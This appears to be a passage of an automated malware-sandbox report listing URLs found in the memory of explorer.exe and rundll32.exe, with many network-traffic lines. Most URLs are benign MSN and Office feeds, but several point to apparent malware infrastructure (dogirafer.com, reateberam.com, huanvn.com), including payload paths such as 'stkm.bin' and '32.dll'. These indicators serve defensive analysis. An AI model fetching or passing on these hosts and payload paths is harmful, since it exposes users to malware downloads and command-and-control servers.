Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 00000009.00000002.4131028570.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2053703533.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.2053703533.00000000096DF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131028570.0000000009702000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB51000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/
Source: explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/3p
Source: explorer.exe, 00000009.00000002.4137653030.000000000C4D0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/6122658-3693405117-2476756634-1002
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/=
Source: explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/A
Source: explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/V=
Source: explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/est/-
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/est/mX
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/gs
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/st/
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2935138310.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4125816199.000000000308D000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3462458492.000000000C98F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3116501774.0000000008FB0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3165319740.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139642747.000000000CA4F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3188591617.0000000008830000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3210130815.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/
Source: explorer.exe, 00000009.00000003.3460642959.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139893118.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461404501.000000000CB92000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/-
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/1b87bd06
Source: explorer.exe, 00000009.00000002.4125057147.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3461113285.000000000132C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3618284131.0000000001332000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/Q
Source: explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/test/p
Source: explorer.exe, 00000009.00000002.4131878847.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://dogirafer.com/vider
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com/a
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2809051343.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125113963.0000023CD8B0F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000002.4125363577.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.php
Source: rundll32.exe, 00000005.00000003.2049378900.0000023CD8BB8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.phpF
Source: rundll32.exe, 00000005.00000002.4125203904.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.2049440069.0000023CD8B80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://huanvn.com:6542/stop.phpl
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000009.00000003.3618362462.0000000009976000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C54A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CB53000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113818155.000000000132C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/
Source: explorer.exe, 00000009.00000003.3618362462.0000000009976000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/=
Source: explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139756497.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.bin
Source: explorer.exe, 00000009.00000003.3460184763.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139756497.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CAB3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/files/stkm.binbm
Source: explorer.exe, 00000009.00000003.2935138310.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460913739.000000000CB29000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4139833595.000000000CB29000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3116501774.0000000008FB0000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3165319740.0000000003460000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3188591617.0000000008830000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3105045961.000000000CB18000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3210130815.0000000008B70000.00000040.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3460184763.000000000CB29000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3113784503.000000000CB22000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/
Source: explorer.exe, 00000009.00000003.3210130815.0000000008B70000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/1424693_495962074200_3017094URLS1https://dogirafer.com/test/3578852_8133
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/32.dll
Source: explorer.exe, 00000009.00000003.2935138310.0000000003460000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/3426159_38935932553563_5901982URLS1https://dogirafer.com/test/8447341_42
Source: explorer.exe, 00000009.00000003.3188591617.0000000008830000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/4782396_3336673150375_5876994URLS1https://dogirafer.com/test/7951999_661
Source: explorer.exe, 00000009.00000003.3116501774.0000000008FB0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/5865723_17335797906044_2080493URLS1https://dogirafer.com/test/5205754_80
Source: explorer.exe, 00000009.00000003.3165319740.0000000003460000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/7765524_55360872352224_4448453URLS1https://dogirafer.com/test/604857_961
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://reateberam.com/test/v
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000009.00000000.2056295568.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4137653030.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000009.00000002.4137653030.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2056295568.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.advancedinstaller.com
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000009.00000000.2052116683.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000009.00000002.4127934640.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000009.00000002.4127934640.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2052116683.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.thawte.com/cps0/
Source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI48D4.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr, MSI4808.tmp.1.dr	String found in binary or memory: https://www.thawte.com/repository0W

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown	Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49997 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50013 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown	Network traffic detected: HTTP traffic on port 49974 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50042 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50054
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50013
Source: unknown	Network traffic detected: HTTP traffic on port 50049 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50052 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50045 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49934
Source: unknown	Network traffic detected: HTTP traffic on port 49885 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49974
Source: unknown	Network traffic detected: HTTP traffic on port 50039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49891
Source: unknown	Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50020
Source: unknown	Network traffic detected: HTTP traffic on port 49988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50027
Source: unknown	Network traffic detected: HTTP traffic on port 49879 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50046 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49885
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49962
Source: unknown	Network traffic detected: HTTP traffic on port 50038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 49873 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50033
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50050 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50047 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50040
Source: unknown	Network traffic detected: HTTP traffic on port 50043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49904 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49879
